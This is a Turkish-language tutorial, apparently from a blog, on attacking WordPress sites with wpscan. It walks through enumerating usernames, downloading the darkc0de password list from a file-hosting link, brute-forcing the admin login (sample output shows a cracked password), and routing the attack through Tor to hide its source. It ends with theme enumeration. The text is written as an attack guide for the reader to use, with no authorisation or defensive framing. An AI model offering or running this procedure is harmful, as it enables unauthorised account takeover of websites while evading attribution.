Makalemizde Wordpress üzerinde kullanıcıları bulmak ve kullanıcılara şifre denemeleri yapmak olacak ayrıca Wordpress üzerinde ekli olan eklentilerin tespiti yapmak olacak. Bonus olarak sizlere tor üzerinden de şifre denemelerini anlatacağım. (Not: İşlemler Kali Linux üzerinde yapılmıştır. CentOS ve Redhat üzerindende yapabilirsiniz ancak wpscan kurmanız gerekmektedir. Konu hakkında pm atarsanız yardımcı olabilirim)
Aşağıdaki komut ile site içerisindeki kullanıcıların tespitini gerçekleştireceğiz.
wpscan --urlwww.example.com --enumerate u
Seçenek ekranlarına Y yazarak Enter yapacağız.
Tarama sonucunda aşağıdaki çıktı gibi bir çıktı alacağız
[+] Enumerating usernames ...
[+] Identified the following 3 user/s:
+----+---------+---------+
| Id | Login | Name |
+----+---------+---------+
| 1 | verifull| verifull|
+----+---------+---------+
| 2 | admin | Admin |
+----+---------+---------+
| 3 | user | user |
+----+---------+---------+
Çıktı ekranındaki hedefimizi seçiyoruz. Hangi kullanıcıya şifre denemesi yapmak istediğimizi belirledikten sonra aşağıdaki adımları takip edeceğiz. Ancak şifre deneme yapacağımız için elimizde şifre denenmesi gereken şifrelerin listesi olması gerekmektedir.
1. Adım Şifre listelerini indirme
Aşağıdaki linkten indire bilirsiniz. İndirdikten sonra dosya çıkarma işlemi yapıp sftp yardımıyla sunucunuza atabilirsiniz.
http://www.mediafire.com/file/tpkrmf1pxjo2ht3/darkc0de.lst.gz
2. Şifre Listelerinin Düzenlenmesi
nano darkc0de.lst
Listeyi açıp düzenleme işlemlerini nano komutu ile yapabiliriz. Denenmesini istediğiniz şifreleri satır, satır olarak listenin her hangi bir satırına yazabilirsiniz. Kaydetmek ve çıkmak için Ctrl+X ve “Y” Enter.
Örneğin;
deneme
1q2w3e4r
0
00
000
0000
00000
000000
0000000
3. Atak başlatma işlemi
wpscan --urlwww.example.com --wordlist darkc0de.lst --username admin
(Saldırı yapacağımız kullanıcıyı admin olarak seçtim ancak farklı kullanıcı adı olabilir o zaman admin yerine kullanıcın adını yazmalısınız. Kullanıcı adını yukarıdaki işlemlerde bulduğumuz için tarafınızdan kullanıcı adı neyse onu yazabilirsiniz.)
Atak işlemimiz başladıktan sonra gelen ekranlara “Y” olarak işaretleyip Enter’layacağız. Şifre denemelerinde eğer şifre bulunursa aşağıdaki çıktı ekranı gelecektir.
[!] The version is out of date, the latest version is 2.3.9
[+] Starting the password brute forcer
[+] [SUCCESS] Login : admin Password : 1q2w3e4r
Brute Forcing 'ibrahim' Time: 00:00:07 < > (12 / 1707468) 0.00% ETA: ??:??:??
+----+---------+------+---------------+
| Id | Login | Name | Password |
+----+---------+------+---------------+
| | admin | | 1q2w3e4r |
+----+---------+------+---------------+
[+] Finished: Wed Aug 17 07:56:51 2016
[+] Requests Done: 81
[+] Memory used: 113.906 MB
[+] Elapsed time: 00:00:20
Atak işlemi tamamlanmış ve şifreyi bulmuş oluyoruz. Ayrıca atak sıralarında spoof olarak atak işlemleri için tor kullanmayı terci edebilirsiniz. tor kullanımı için yukarıdaki wpscan kısmından önce torsocks yazmanız yeterli olacaktır.
Tor Kurulumu
Tor yüklemek için aşağıdaki komut ile yükleme işlemini başlatabilirsiniz.
yum install tor -y
Tor yükleme işlemi tamamlandıktan sonra aşağıdaki komut ile tor’u başlatabiliriz.
service tor start
Kali Linux için tor yükleme işlemleri
Tor yüklemek için aşağıdaki komut ile yükleme işlemini başlatabilirsiniz.
apt-get install tor -y
Tor yükleme işlemi tamamlandıktan sonra aşağıdaki komut ile tor’u başlatabiliriz.
service tor start
Tor artık aktif olarak çalışıyor.
Son olarak Wordpress site içerisinde bulunan temaları görüntülemek için aşağıdaki komutu kullanacağız.
wpscan --urlwww.example.com --enumerate t
Arkadaşlar önemli bilgilendirme olarak Wordpress sitesinde jetpack veya captcha varsa şifre denemeleriniz başarısız olur.
